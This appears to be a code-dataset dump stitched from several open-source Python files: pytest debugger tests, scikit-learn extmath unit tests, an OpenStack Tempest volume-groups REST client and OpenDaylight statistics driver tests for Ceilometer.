rest = child.read().decode("utf8")
assert "1 failed" in rest
assert "def test_1" in rest
assert "hello17" in rest # out is captured
assert "hello18" in rest # out is captured
self.flush(child)
def test_pdb_used_outside_test(self, testdir):
p1 = testdir.makepyfile("""
import pytest
pytest.set_trace()
x = 5
""")
child = testdir.spawn("%s %s" %(sys.executable, p1))
child.expect("x = 5")
child.sendeof()
self.flush(child)
def test_pdb_used_in_generate_tests(self, testdir):
p1 = testdir.makepyfile("""
import pytest
def pytest_generate_tests(metafunc):
pytest.set_trace()
x = 5
def test_foo(a):
pass
""")
child = testdir.spawn_pytest(str(p1))
child.expect("x = 5")
child.sendeof()
self.flush(child)
def test_pdb_collection_failure_is_shown(self, testdir):
p1 = testdir.makepyfile("""xxx """)
result = testdir.runpytest_subprocess("--pdb", p1)
result.stdout.fnmatch_lines([
"*NameError*xxx*",
"*1 error*",
])
def test_enter_pdb_hook_is_called(self, testdir):
testdir.makeconftest("""
def pytest_enter_pdb(config):
assert config.testing_verification == 'configured'
            print('enter_pdb_hook')
def pytest_configure(config):
config.testing_verification = 'configured'
""")
p1 = testdir.makepyfile("""
import pytest
def test_foo():
pytest.set_trace()
""")
child = testdir.spawn_pytest(str(p1))
child.expect("enter_pdb_hook")
child.send('c\n')
child.sendeof()
self.flush(child)
def test_pdb_custom_cls(self, testdir):
called = []
# install dummy debugger class and track which methods were called on it
class _CustomPdb:
def __init__(self, *args, **kwargs):
called.append("init")
def reset(self):
called.append("reset")
def interaction(self, *args):
called.append("interaction")
_pytest._CustomPdb = _CustomPdb
p1 = testdir.makepyfile("""xxx """)
result = testdir.runpytest_inprocess(
"--pdbcls=_pytest:_CustomPdb", p1)
result.stdout.fnmatch_lines([
"*NameError*xxx*",
"*1 error*",
])
assert called == ["init", "reset", "interaction"]
| mit | 1,663,352,925,457,144,300 | 29.647849 | 80 | 0.513464 | false |
anirudhjayaraman/scikit-learn | sklearn/utils/tests/test_extmath.py | 70 | 16531 | # Authors: Olivier Grisel <[email protected]>
# Mathieu Blondel <[email protected]>
# Denis Engemann <[email protected]>
#
# License: BSD 3 clause
import numpy as np
from scipy import sparse
from scipy import linalg
from scipy import stats
from sklearn.utils.testing import assert_equal
from sklearn.utils.testing import assert_almost_equal
from sklearn.utils.testing import assert_array_equal
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_greater
from sklearn.utils.testing import assert_raises
from sklearn.utils.extmath import density
from sklearn.utils.extmath import logsumexp
from sklearn.utils.extmath import norm, squared_norm
from sklearn.utils.extmath import randomized_svd
from sklearn.utils.extmath import row_norms
from sklearn.utils.extmath import weighted_mode
from sklearn.utils.extmath import cartesian
from sklearn.utils.extmath import log_logistic
from sklearn.utils.extmath import fast_dot, _fast_dot
from sklearn.utils.extmath import svd_flip
from sklearn.utils.extmath import _batch_mean_variance_update
from sklearn.utils.extmath import _deterministic_vector_sign_flip
from sklearn.utils.extmath import softmax
from sklearn.datasets.samples_generator import make_low_rank_matrix
def test_density():
rng = np.random.RandomState(0)
X = rng.randint(10, size=(10, 5))
X[1, 2] = 0
X[5, 3] = 0
X_csr = sparse.csr_matrix(X)
X_csc = sparse.csc_matrix(X)
X_coo = sparse.coo_matrix(X)
X_lil = sparse.lil_matrix(X)
for X_ in (X_csr, X_csc, X_coo, X_lil):
assert_equal(density(X_), density(X))
def test_uniform_weights():
# with uniform weights, results should be identical to stats.mode
rng = np.random.RandomState(0)
x = rng.randint(10, size=(10, 5))
weights = np.ones(x.shape)
for axis in (None, 0, 1):
mode, score = stats.mode(x, axis)
mode2, score2 = weighted_mode(x, weights, axis)
assert_true(np.all(mode == mode2))
assert_true(np.all(score == score2))
def test_random_weights():
# set this up so that each row should have a weighted mode of 6,
# with a score that is easily reproduced
mode_result = 6
rng = np.random.RandomState(0)
x = rng.randint(mode_result, size=(100, 10))
w = rng.random_sample(x.shape)
x[:, :5] = mode_result
w[:, :5] += 1
mode, score = weighted_mode(x, w, axis=1)
assert_array_equal(mode, mode_result)
assert_array_almost_equal(score.ravel(), w[:, :5].sum(1))
def test_logsumexp():
# Try to add some smallish numbers in logspace
x = np.array([1e-40] * 1000000)
logx = np.log(x)
assert_almost_equal(np.exp(logsumexp(logx)), x.sum())
X = np.vstack([x, x])
logX = np.vstack([logx, logx])
assert_array_almost_equal(np.exp(logsumexp(logX, axis=0)), X.sum(axis=0))
assert_array_almost_equal(np.exp(logsumexp(logX, axis=1)), X.sum(axis=1))
def test_randomized_svd_low_rank():
# Check that extmath.randomized_svd is consistent with linalg.svd
n_samples = 100
n_features = 500
rank = 5
k = 10
# generate a matrix X of approximate effective rank `rank` and no noise
# component (very structured signal):
X = make_low_rank_matrix(n_samples=n_samples, n_features=n_features,
effective_rank=rank, tail_strength=0.0,
random_state=0)
assert_equal(X.shape, (n_samples, n_features))
# compute the singular values of X using the slow exact method
U, s, V = linalg.svd(X, full_matrices=False)
# compute the singular values of X using the fast approximate method
Ua, sa, Va = randomized_svd(X, k)
assert_equal(Ua.shape, (n_samples, k))
assert_equal(sa.shape, (k,))
assert_equal(Va.shape, (k, n_features))
# ensure that the singular values of both methods are equal up to the real
# rank of the matrix
assert_almost_equal(s[:k], sa)
# check the singular vectors too (while not checking the sign)
assert_almost_equal(np.dot(U[:, :k], V[:k, :]), np.dot(Ua, Va))
# check the sparse matrix representation
X = sparse.csr_matrix(X)
# compute the singular values of X using the fast approximate method
Ua, sa, Va = randomized_svd(X, k)
assert_almost_equal(s[:rank], sa[:rank])
def test_norm_squared_norm():
X = np.random.RandomState(42).randn(50, 63)
X *= 100 # check stability
X += 200
assert_almost_equal(np.linalg.norm(X.ravel()), norm(X))
assert_almost_equal(norm(X) ** 2, squared_norm(X), decimal=6)
assert_almost_equal(np.linalg.norm(X), np.sqrt(squared_norm(X)), decimal=6)
def test_row_norms():
X = np.random.RandomState(42).randn(100, 100)
sq_norm = (X ** 2).sum(axis=1)
assert_array_almost_equal(sq_norm, row_norms(X, squared=True), 5)
assert_array_almost_equal(np.sqrt(sq_norm), row_norms(X))
Xcsr = sparse.csr_matrix(X, dtype=np.float32)
assert_array_almost_equal(sq_norm, row_norms(Xcsr, squared=True), 5)
assert_array_almost_equal(np.sqrt(sq_norm), row_norms(Xcsr))
def test_randomized_svd_low_rank_with_noise():
# Check that extmath.randomized_svd can handle noisy matrices
n_samples = 100
n_features = 500
rank = 5
k = 10
    # generate a matrix X of approximate effective rank `rank` and an
# important noisy component
X = make_low_rank_matrix(n_samples=n_samples, n_features=n_features,
effective_rank=rank, tail_strength=0.5,
random_state=0)
assert_equal(X.shape, (n_samples, n_features))
# compute the singular values of X using the slow exact method
_, s, _ = linalg.svd(X, full_matrices=False)
# compute the singular values of X using the fast approximate method
# without the iterated power method
_, sa, _ = randomized_svd(X, k, n_iter=0)
# the approximation does not tolerate the noise:
assert_greater(np.abs(s[:k] - sa).max(), 0.05)
# compute the singular values of X using the fast approximate method with
# iterated power method
_, sap, _ = randomized_svd(X, k, n_iter=5)
    # the iterated power method helps get rid of the noise:
assert_almost_equal(s[:k], sap, decimal=3)
def test_randomized_svd_infinite_rank():
# Check that extmath.randomized_svd can handle noisy matrices
n_samples = 100
n_features = 500
rank = 5
k = 10
    # let us try again without a 'low_rank' component: just regularly but slowly
# decreasing singular values: the rank of the data matrix is infinite
X = make_low_rank_matrix(n_samples=n_samples, n_features=n_features,
effective_rank=rank, tail_strength=1.0,
random_state=0)
assert_equal(X.shape, (n_samples, n_features))
# compute the singular values of X using the slow exact method
_, s, _ = linalg.svd(X, full_matrices=False)
# compute the singular values of X using the fast approximate method
# without the iterated power method
_, sa, _ = randomized_svd(X, k, n_iter=0)
# the approximation does not tolerate the noise:
assert_greater(np.abs(s[:k] - sa).max(), 0.1)
# compute the singular values of X using the fast approximate method with
# iterated power method
_, sap, _ = randomized_svd(X, k, n_iter=5)
# the iterated power method is still managing to get most of the structure
# at the requested rank
assert_almost_equal(s[:k], sap, decimal=3)
def test_randomized_svd_transpose_consistency():
    # Check that transposing the design matrix has limited impact
n_samples = 100
n_features = 500
rank = 4
k = 10
X = make_low_rank_matrix(n_samples=n_samples, n_features=n_features,
effective_rank=rank, tail_strength=0.5,
random_state=0)
assert_equal(X.shape, (n_samples, n_features))
U1, s1, V1 = randomized_svd(X, k, n_iter=3, transpose=False,
random_state=0)
U2, s2, V2 = randomized_svd(X, k, n_iter=3, transpose=True,
random_state=0)
U3, s3, V3 = randomized_svd(X, k, n_iter=3, transpose='auto',
random_state=0)
U4, s4, V4 = linalg.svd(X, full_matrices=False)
assert_almost_equal(s1, s4[:k], decimal=3)
assert_almost_equal(s2, s4[:k], decimal=3)
assert_almost_equal(s3, s4[:k], decimal=3)
assert_almost_equal(np.dot(U1, V1), np.dot(U4[:, :k], V4[:k, :]),
decimal=2)
assert_almost_equal(np.dot(U2, V2), np.dot(U4[:, :k], V4[:k, :]),
decimal=2)
# in this case 'auto' is equivalent to transpose
assert_almost_equal(s2, s3)
def test_svd_flip():
# Check that svd_flip works in both situations, and reconstructs input.
rs = np.random.RandomState(1999)
n_samples = 20
n_features = 10
X = rs.randn(n_samples, n_features)
# Check matrix reconstruction
U, S, V = linalg.svd(X, full_matrices=False)
U1, V1 = svd_flip(U, V, u_based_decision=False)
assert_almost_equal(np.dot(U1 * S, V1), X, decimal=6)
# Check transposed matrix reconstruction
XT = X.T
U, S, V = linalg.svd(XT, full_matrices=False)
U2, V2 = svd_flip(U, V, u_based_decision=True)
assert_almost_equal(np.dot(U2 * S, V2), XT, decimal=6)
# Check that different flip methods are equivalent under reconstruction
U_flip1, V_flip1 = svd_flip(U, V, u_based_decision=True)
assert_almost_equal(np.dot(U_flip1 * S, V_flip1), XT, decimal=6)
U_flip2, V_flip2 = svd_flip(U, V, u_based_decision=False)
assert_almost_equal(np.dot(U_flip2 * S, V_flip2), XT, decimal=6)
def test_randomized_svd_sign_flip():
a = np.array([[2.0, 0.0], [0.0, 1.0]])
u1, s1, v1 = randomized_svd(a, 2, flip_sign=True, random_state=41)
for seed in range(10):
u2, s2, v2 = randomized_svd(a, 2, flip_sign=True, random_state=seed)
assert_almost_equal(u1, u2)
assert_almost_equal(v1, v2)
assert_almost_equal(np.dot(u2 * s2, v2), a)
assert_almost_equal(np.dot(u2.T, u2), np.eye(2))
assert_almost_equal(np.dot(v2.T, v2), np.eye(2))
def test_cartesian():
# Check if cartesian product delivers the right results
axes = (np.array([1, 2, 3]), np.array([4, 5]), np.array([6, 7]))
true_out = np.array([[1, 4, 6],
[1, 4, 7],
[1, 5, 6],
[1, 5, 7],
[2, 4, 6],
[2, 4, 7],
[2, 5, 6],
[2, 5, 7],
[3, 4, 6],
[3, 4, 7],
[3, 5, 6],
[3, 5, 7]])
out = cartesian(axes)
assert_array_equal(true_out, out)
# check single axis
x = np.arange(3)
assert_array_equal(x[:, np.newaxis], cartesian((x,)))
def test_logistic_sigmoid():
# Check correctness and robustness of logistic sigmoid implementation
naive_logistic = lambda x: 1 / (1 + np.exp(-x))
naive_log_logistic = lambda x: np.log(naive_logistic(x))
x = np.linspace(-2, 2, 50)
assert_array_almost_equal(log_logistic(x), naive_log_logistic(x))
extreme_x = np.array([-100., 100.])
assert_array_almost_equal(log_logistic(extreme_x), [-100, 0])
def test_fast_dot():
# Check fast dot blas wrapper function
if fast_dot is np.dot:
return
rng = np.random.RandomState(42)
A = rng.random_sample([2, 10])
B = rng.random_sample([2, 10])
try:
linalg.get_blas_funcs(['gemm'])[0]
has_blas = True
except (AttributeError, ValueError):
has_blas = False
if has_blas:
# Test _fast_dot for invalid input.
        # Mismatched dtypes.
for dt1, dt2 in [['f8', 'f4'], ['i4', 'i4']]:
assert_raises(ValueError, _fast_dot, A.astype(dt1),
B.astype(dt2).T)
# Malformed data.
## ndim == 0
E = np.empty(0)
assert_raises(ValueError, _fast_dot, E, E)
## ndim == 1
assert_raises(ValueError, _fast_dot, A, A[0])
## ndim > 2
assert_raises(ValueError, _fast_dot, A.T, np.array([A, A]))
## min(shape) == 1
assert_raises(ValueError, _fast_dot, A, A[0, :][None, :])
# test for matrix mismatch error
assert_raises(ValueError, _fast_dot, A, A)
# Test cov-like use case + dtypes.
for dtype in ['f8', 'f4']:
A = A.astype(dtype)
B = B.astype(dtype)
# col < row
C = np.dot(A.T, A)
C_ = fast_dot(A.T, A)
assert_almost_equal(C, C_, decimal=5)
C = np.dot(A.T, B)
C_ = fast_dot(A.T, B)
assert_almost_equal(C, C_, decimal=5)
C = np.dot(A, B.T)
C_ = fast_dot(A, B.T)
assert_almost_equal(C, C_, decimal=5)
# Test square matrix * rectangular use case.
A = rng.random_sample([2, 2])
for dtype in ['f8', 'f4']:
A = A.astype(dtype)
B = B.astype(dtype)
C = np.dot(A, B)
C_ = fast_dot(A, B)
assert_almost_equal(C, C_, decimal=5)
C = np.dot(A.T, B)
C_ = fast_dot(A.T, B)
assert_almost_equal(C, C_, decimal=5)
if has_blas:
for x in [np.array([[d] * 10] * 2) for d in [np.inf, np.nan]]:
assert_raises(ValueError, _fast_dot, x, x.T)
def test_incremental_variance_update_formulas():
# Test Youngs and Cramer incremental variance formulas.
# Doggie data from http://www.mathsisfun.com/data/standard-deviation.html
A = np.array([[600, 470, 170, 430, 300],
[600, 470, 170, 430, 300],
[600, 470, 170, 430, 300],
[600, 470, 170, 430, 300]]).T
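    # Split A in two batches, fold the second batch into the running mean and
    # variance of the first, and check the result matches the statistics of
    # the full array.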
idx = 2
X1 = A[:idx, :]
X2 = A[idx:, :]
old_means = X1.mean(axis=0)
old_variances = X1.var(axis=0)
old_sample_count = X1.shape[0]
final_means, final_variances, final_count = _batch_mean_variance_update(
X2, old_means, old_variances, old_sample_count)
assert_almost_equal(final_means, A.mean(axis=0), 6)
assert_almost_equal(final_variances, A.var(axis=0), 6)
assert_almost_equal(final_count, A.shape[0])
def test_incremental_variance_ddof():
# Test that degrees of freedom parameter for calculations are correct.
rng = np.random.RandomState(1999)
X = rng.randn(50, 10)
n_samples, n_features = X.shape
for batch_size in [11, 20, 37]:
steps = np.arange(0, X.shape[0], batch_size)
if steps[-1] != X.shape[0]:
steps = np.hstack([steps, n_samples])
for i, j in zip(steps[:-1], steps[1:]):
batch = X[i:j, :]
if i == 0:
incremental_means = batch.mean(axis=0)
incremental_variances = batch.var(axis=0)
# Assign this twice so that the test logic is consistent
incremental_count = batch.shape[0]
sample_count = batch.shape[0]
else:
result = _batch_mean_variance_update(
batch, incremental_means, incremental_variances,
sample_count)
(incremental_means, incremental_variances,
incremental_count) = result
sample_count += batch.shape[0]
calculated_means = np.mean(X[:j], axis=0)
calculated_variances = np.var(X[:j], axis=0)
assert_almost_equal(incremental_means, calculated_means, 6)
assert_almost_equal(incremental_variances,
calculated_variances, 6)
assert_equal(incremental_count, sample_count)
def test_vector_sign_flip():
# Testing that sign flip is working & largest value has positive sign
data = np.random.RandomState(36).randn(5, 5)
max_abs_rows = np.argmax(np.abs(data), axis=1)
data_flipped = _deterministic_vector_sign_flip(data)
max_rows = np.argmax(data_flipped, axis=1)
assert_array_equal(max_abs_rows, max_rows)
signs = np.sign(data[range(data.shape[0]), max_abs_rows])
assert_array_equal(data, data_flipped * signs[:, np.newaxis])
def test_softmax():
rng = np.random.RandomState(0)
X = rng.randn(3, 5)
exp_X = np.exp(X)
sum_exp_X = np.sum(exp_X, axis=1).reshape((-1, 1))
assert_array_almost_equal(softmax(X), exp_X / sum_exp_X)
| bsd-3-clause | 2,544,661,088,037,422,000 | 33.728992 | 79 | 0.605589 | false |
cisco-openstack/tempest | tempest/lib/services/volume/v3/groups_client.py | 2 | 5170 | # Copyright (C) 2017 Dell Inc. or its subsidiaries.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_serialization import jsonutils as json
from six.moves.urllib import parse as urllib
from tempest.lib.common import rest_client
from tempest.lib import exceptions as lib_exc
from tempest.lib.services.volume import base_client
class GroupsClient(base_client.BaseClient):
"""Client class to send CRUD Volume Group API requests"""
def create_group(self, **kwargs):
"""Creates a group.
group_type and volume_types are required parameters in kwargs.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/block-storage/v3/#create-group
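        Example (the group type and volume type ids are assumed to exist):
            create_group(name='my-group',
                         group_type='<group-type-id>',
                         volume_types=['<volume-type-id>'])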
"""
post_body = json.dumps({'group': kwargs})
resp, body = self.post('groups', post_body)
body = json.loads(body)
self.expected_success(202, resp.status)
return rest_client.ResponseBody(resp, body)
def delete_group(self, group_id, delete_volumes=True):
"""Deletes a group.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/block-storage/v3/#delete-group
"""
post_body = {'delete-volumes': delete_volumes}
post_body = json.dumps({'delete': post_body})
resp, body = self.post('groups/%s/action' % group_id,
post_body)
self.expected_success(202, resp.status)
return rest_client.ResponseBody(resp, body)
def show_group(self, group_id):
"""Returns the details of a single group.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/block-storage/v3/#show-group-details
"""
url = "groups/%s" % str(group_id)
resp, body = self.get(url)
body = json.loads(body)
self.expected_success(200, resp.status)
return rest_client.ResponseBody(resp, body)
def list_groups(self, detail=False, **params):
"""Lists information for all the tenant's groups.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/block-storage/v3/#list-groups
https://docs.openstack.org/api-ref/block-storage/v3/#list-groups-with-details
"""
url = "groups"
if detail:
url += "/detail"
if params:
url += '?%s' % urllib.urlencode(params)
resp, body = self.get(url)
body = json.loads(body)
self.expected_success(200, resp.status)
return rest_client.ResponseBody(resp, body)
def create_group_from_source(self, **kwargs):
"""Creates a group from source.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/block-storage/v3/#create-group-from-source
"""
post_body = json.dumps({'create-from-src': kwargs})
resp, body = self.post('groups/action', post_body)
body = json.loads(body)
self.expected_success(202, resp.status)
return rest_client.ResponseBody(resp, body)
def update_group(self, group_id, **kwargs):
"""Updates the specified group.
For a full list of available parameters, please refer to the official
API reference:
https://docs.openstack.org/api-ref/block-storage/v3/#update-group
"""
put_body = json.dumps({'group': kwargs})
resp, body = self.put('groups/%s' % group_id, put_body)
self.expected_success(202, resp.status)
return rest_client.ResponseBody(resp, body)
def reset_group_status(self, group_id, status_to_set):
"""Resets group status.
For more information, please refer to the official API reference:
https://docs.openstack.org/api-ref/block-storage/v3/#reset-group-status
"""
post_body = json.dumps({'reset_status': {'status': status_to_set}})
resp, body = self.post('groups/%s/action' % group_id, post_body)
self.expected_success(202, resp.status)
return rest_client.ResponseBody(resp, body)
def is_resource_deleted(self, id):
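        # Used by the base rest client's wait_for_resource_deletion(): a
        # NotFound from show_group means the group is gone.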
try:
self.show_group(id)
except lib_exc.NotFound:
return True
return False
@property
def resource_type(self):
"""Returns the primary type of resource this client works with."""
return 'group'
| apache-2.0 | 3,082,253,233,467,389,000 | 38.166667 | 85 | 0.64294 | false |
r-mibu/ceilometer | ceilometer/tests/network/statistics/opendaylight/test_driver.py | 12 | 66291 | #
# Copyright 2013 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import mock
from oslotest import base
import six
from six import moves
from six.moves.urllib import parse as url_parse
from ceilometer.network.statistics.opendaylight import driver
@six.add_metaclass(abc.ABCMeta)
class _Base(base.BaseTestCase):
@abc.abstractproperty
def flow_data(self):
pass
@abc.abstractproperty
def port_data(self):
pass
@abc.abstractproperty
def table_data(self):
pass
@abc.abstractproperty
def topology_data(self):
pass
@abc.abstractproperty
def switch_data(self):
pass
@abc.abstractproperty
def user_links_data(self):
pass
@abc.abstractproperty
def active_hosts_data(self):
pass
@abc.abstractproperty
def inactive_hosts_data(self):
pass
fake_odl_url = url_parse.ParseResult('opendaylight',
'localhost:8080',
'controller/nb/v2',
None,
None,
None)
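    # Query-string options the driver reads from the endpoint URL: credentials,
    # HTTP scheme, one or more container names and the authentication mode.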
fake_params = url_parse.parse_qs('user=admin&password=admin&scheme=http&'
'container_name=default&auth=basic')
fake_params_multi_container = (
url_parse.parse_qs('user=admin&password=admin&scheme=http&'
'container_name=first&container_name=second&'
'auth=basic'))
def setUp(self):
super(_Base, self).setUp()
self.addCleanup(mock.patch.stopall)
self.driver = driver.OpenDayLightDriver()
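        # Patch every OpenDaylight REST client call so the driver consumes the
        # canned payloads defined on the concrete test class instead of
        # talking to a real controller.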
self.get_flow_statistics = mock.patch(
'ceilometer.network.statistics.opendaylight.client.'
'StatisticsAPIClient.get_flow_statistics',
return_value=self.flow_data).start()
mock.patch('ceilometer.network.statistics.opendaylight.client.'
'StatisticsAPIClient.get_table_statistics',
return_value=self.table_data).start()
mock.patch('ceilometer.network.statistics.opendaylight.client.'
'StatisticsAPIClient.get_port_statistics',
return_value=self.port_data).start()
mock.patch('ceilometer.network.statistics.opendaylight.client.'
'TopologyAPIClient.get_topology',
return_value=self.topology_data).start()
mock.patch('ceilometer.network.statistics.opendaylight.client.'
'TopologyAPIClient.get_user_links',
return_value=self.user_links_data).start()
mock.patch('ceilometer.network.statistics.opendaylight.client.'
'SwitchManagerAPIClient.get_nodes',
return_value=self.switch_data).start()
mock.patch('ceilometer.network.statistics.opendaylight.client.'
'HostTrackerAPIClient.get_active_hosts',
return_value=self.active_hosts_data).start()
mock.patch('ceilometer.network.statistics.opendaylight.client.'
'HostTrackerAPIClient.get_inactive_hosts',
return_value=self.inactive_hosts_data).start()
def _test_for_meter(self, meter_name, expected_data):
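        # Each sample is a (volume, resource id, resource metadata, timestamp)
        # tuple; the first three are compared against the expectation, the
        # timestamp only has to be present.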
sample_data = self.driver.get_sample_data(meter_name,
self.fake_odl_url,
self.fake_params,
{})
for sample, expected in moves.zip(sample_data, expected_data):
self.assertEqual(expected[0], sample[0]) # check volume
self.assertEqual(expected[1], sample[1]) # check resource id
self.assertEqual(expected[2], sample[2]) # check resource metadata
self.assertIsNotNone(sample[3]) # timestamp
class TestOpenDayLightDriverSpecial(_Base):
flow_data = {"flowStatistics": []}
port_data = {"portStatistics": []}
table_data = {"tableStatistics": []}
topology_data = {"edgeProperties": []}
switch_data = {"nodeProperties": []}
user_links_data = {"userLinks": []}
active_hosts_data = {"hostConfig": []}
inactive_hosts_data = {"hostConfig": []}
def test_not_implemented_meter(self):
sample_data = self.driver.get_sample_data('egg',
self.fake_odl_url,
self.fake_params,
{})
self.assertIsNone(sample_data)
sample_data = self.driver.get_sample_data('switch.table.egg',
self.fake_odl_url,
self.fake_params,
{})
self.assertIsNone(sample_data)
def test_cache(self):
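        # Reusing the same cache dict must not trigger a second REST request;
        # a fresh cache does.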
cache = {}
self.driver.get_sample_data('switch',
self.fake_odl_url,
self.fake_params,
cache)
self.driver.get_sample_data('switch',
self.fake_odl_url,
self.fake_params,
cache)
self.assertEqual(1, self.get_flow_statistics.call_count)
cache = {}
self.driver.get_sample_data('switch',
self.fake_odl_url,
self.fake_params,
cache)
self.assertEqual(2, self.get_flow_statistics.call_count)
def test_multi_container(self):
cache = {}
self.driver.get_sample_data('switch',
self.fake_odl_url,
self.fake_params_multi_container,
cache)
self.assertEqual(2, self.get_flow_statistics.call_count)
self.assertIn('network.statistics.opendaylight', cache)
odl_data = cache['network.statistics.opendaylight']
self.assertIn('first', odl_data)
self.assertIn('second', odl_data)
def test_http_error(self):
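        # A failing REST call yields no samples; with several containers the
        # data from the container that did respond is still cached.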
mock.patch('ceilometer.network.statistics.opendaylight.client.'
'StatisticsAPIClient.get_flow_statistics',
side_effect=Exception()).start()
sample_data = self.driver.get_sample_data('switch',
self.fake_odl_url,
self.fake_params,
{})
self.assertEqual(0, len(sample_data))
mock.patch('ceilometer.network.statistics.opendaylight.client.'
'StatisticsAPIClient.get_flow_statistics',
side_effect=[Exception(), self.flow_data]).start()
cache = {}
self.driver.get_sample_data('switch',
self.fake_odl_url,
self.fake_params_multi_container,
cache)
self.assertIn('network.statistics.opendaylight', cache)
odl_data = cache['network.statistics.opendaylight']
self.assertIn('second', odl_data)
class TestOpenDayLightDriverSimple(_Base):
flow_data = {
"flowStatistics": [
{
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"flowStatistic": [
{
"flow": {
"match": {
"matchField": [
{
"type": "DL_TYPE",
"value": "2048"
},
{
"mask": "255.255.255.255",
"type": "NW_DST",
"value": "1.1.1.1"
}
]
},
"actions": {
"@type": "output",
"port": {
"id": "3",
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"type": "OF"
}
},
"hardTimeout": "0",
"id": "0",
"idleTimeout": "0",
"priority": "1"
},
"byteCount": "0",
"durationNanoseconds": "397000000",
"durationSeconds": "1828",
"packetCount": "0",
"tableId": "0"
},
]
}
]
}
port_data = {
"portStatistics": [
{
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"portStatistic": [
{
"nodeConnector": {
"id": "4",
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"type": "OF"
},
"collisionCount": "0",
"receiveBytes": "0",
"receiveCrcError": "0",
"receiveDrops": "0",
"receiveErrors": "0",
"receiveFrameError": "0",
"receiveOverRunError": "0",
"receivePackets": "0",
"transmitBytes": "0",
"transmitDrops": "0",
"transmitErrors": "0",
"transmitPackets": "0"
},
]
}
]
}
table_data = {
"tableStatistics": [
{
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"tableStatistic": [
{
"activeCount": "11",
"lookupCount": "816",
"matchedCount": "220",
"nodeTable": {
"id": "0",
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
}
}
},
]
}
]
}
topology_data = {"edgeProperties": []}
switch_data = {
"nodeProperties": [
{
"node": {
"id": "00:00:00:00:00:00:00:02",
"type": "OF"
},
"properties": {
"actions": {
"value": "4095"
},
"timeStamp": {
"name": "connectedSince",
"value": "1377291227877"
}
}
},
]
}
user_links_data = {"userLinks": []}
active_hosts_data = {"hostConfig": []}
inactive_hosts_data = {"hostConfig": []}
def test_meter_switch(self):
expected_data = [
(1, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
"properties_actions": "4095",
"properties_timeStamp_connectedSince": "1377291227877"
}),
]
self._test_for_meter('switch', expected_data)
def test_meter_switch_port(self):
expected_data = [
(1, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4',
}),
]
self._test_for_meter('switch.port', expected_data)
def test_meter_switch_port_receive_packets(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
]
self._test_for_meter('switch.port.receive.packets', expected_data)
def test_meter_switch_port_transmit_packets(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
]
self._test_for_meter('switch.port.transmit.packets', expected_data)
def test_meter_switch_port_receive_bytes(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
]
self._test_for_meter('switch.port.receive.bytes', expected_data)
def test_meter_switch_port_transmit_bytes(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
]
self._test_for_meter('switch.port.transmit.bytes', expected_data)
def test_meter_switch_port_receive_drops(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
]
self._test_for_meter('switch.port.receive.drops', expected_data)
def test_meter_switch_port_transmit_drops(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
]
self._test_for_meter('switch.port.transmit.drops', expected_data)
def test_meter_switch_port_receive_errors(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
]
self._test_for_meter('switch.port.receive.errors', expected_data)
def test_meter_switch_port_transmit_errors(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
]
self._test_for_meter('switch.port.transmit.errors', expected_data)
def test_meter_switch_port_receive_frame_error(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
]
self._test_for_meter('switch.port.receive.frame_error', expected_data)
def test_meter_switch_port_receive_overrun_error(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
]
self._test_for_meter('switch.port.receive.overrun_error',
expected_data)
def test_meter_switch_port_receive_crc_error(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
]
self._test_for_meter('switch.port.receive.crc_error', expected_data)
def test_meter_switch_port_collision_count(self):
expected_data = [
(0, "00:00:00:00:00:00:00:02", {
'controller': 'OpenDaylight',
'container': 'default',
'port': '4'}),
]
self._test_for_meter('switch.port.collision.count', expected_data)
